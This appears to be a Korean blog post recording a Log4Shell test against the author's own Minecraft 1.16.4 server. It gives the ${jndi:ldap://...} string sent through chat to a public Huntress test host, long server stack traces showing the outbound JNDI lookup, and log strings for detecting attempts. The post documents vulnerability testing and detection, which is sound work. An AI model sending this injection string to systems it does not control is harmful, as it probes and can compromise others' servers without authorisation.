글 작성자: 근삼이

테스트 대상 사이트

  • modutech 마인크래프트 공개 서버
    • 서버 주소 : 비밀><(테스트 목적은 개인 문의)
    • 서버 버전 : 1.16.4
  • 테스트 코드
${jndi:ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43}
  • 방법 : 마인크래프트 채팅창에 익스플로잇 코드를 입력... 끝... 

Log4j를 안 쓰는 Java 애플리케이션이 뭐가 있을까.. 보안 담당자들 머리 터지는 소리가 여기까지 들리는 것 같다.

  • 동작 확인

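  • 서버 로그 : 아래 스택 트레이스를 밑에서부터 읽으면, 채팅 메시지가 콘솔로 출력되는 과정(PlayerConnection.chat → ColouredConsoleSender.sendMessage → Log4j)에서 StrSubstitutor가 메시지 안의 ${jndi:...} 구문을 치환하려고 JndiLookup → JndiManager.lookup 을 호출한 것을 볼 수 있다. NamingException(LDAP error code 1)은 테스트용 LDAP 서버가 오류 응답을 돌려줬다는 뜻일 뿐이고, 서버가 외부 LDAP 주소로 조회를 실제로 보냈다는 점에서 취약한 상태로 판단할 수 있다. 운영자 입장에서는 서버 로그에서 "${jndi:" 와 "Error looking up JNDI resource" 문자열을 검색하면 같은 시도가 있었는지 확인할 수 있다.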
>2021-12-12 06:18:30,471 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingException: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d7055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:232)
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:217)
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:57)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:177)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:170)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:161)
        at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(RollingRandomAccessFileAppender.java:218)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1852)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.java:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209)
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(ColouredConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

2021-12-12 06:18:31,083 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingException: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d7055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:323)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:208)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:57)
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1852)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.java:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209)
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(ColouredConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

2021-12-12 06:18:31,696 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingException: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d7055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:323)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:208)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:57)
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1852)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.java:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209)
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(ColouredConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

[06:18:29] [Async Chat Thread - #2/INFO]: [노예] GeunSam2 : ${jndi:ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43}

참고 자료

 
